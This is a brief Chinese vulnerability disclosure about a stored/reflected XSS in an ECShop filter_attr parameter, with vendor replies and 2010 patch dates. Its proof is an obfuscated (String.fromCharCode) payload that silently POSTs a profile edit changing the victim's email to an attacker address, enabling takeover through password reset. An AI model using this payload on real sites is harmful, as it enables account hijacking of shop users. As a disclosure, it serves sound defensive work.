通过XSS构造post提交个人资料修改,修改为可操作的邮箱,然后密码找回。

漏洞证明:

?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%22%3E%3Cscript%3Eeval%28String.fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%29%29%3C/script%3E%3C%22

当然,以文件包含的方式利用更简洁


厂商发表
过滤不严,正在修复。

2010-09-03:补丁已经发布补丁下载地址:

2010-09-06:对url进行编码和解码,去除没有必要的参数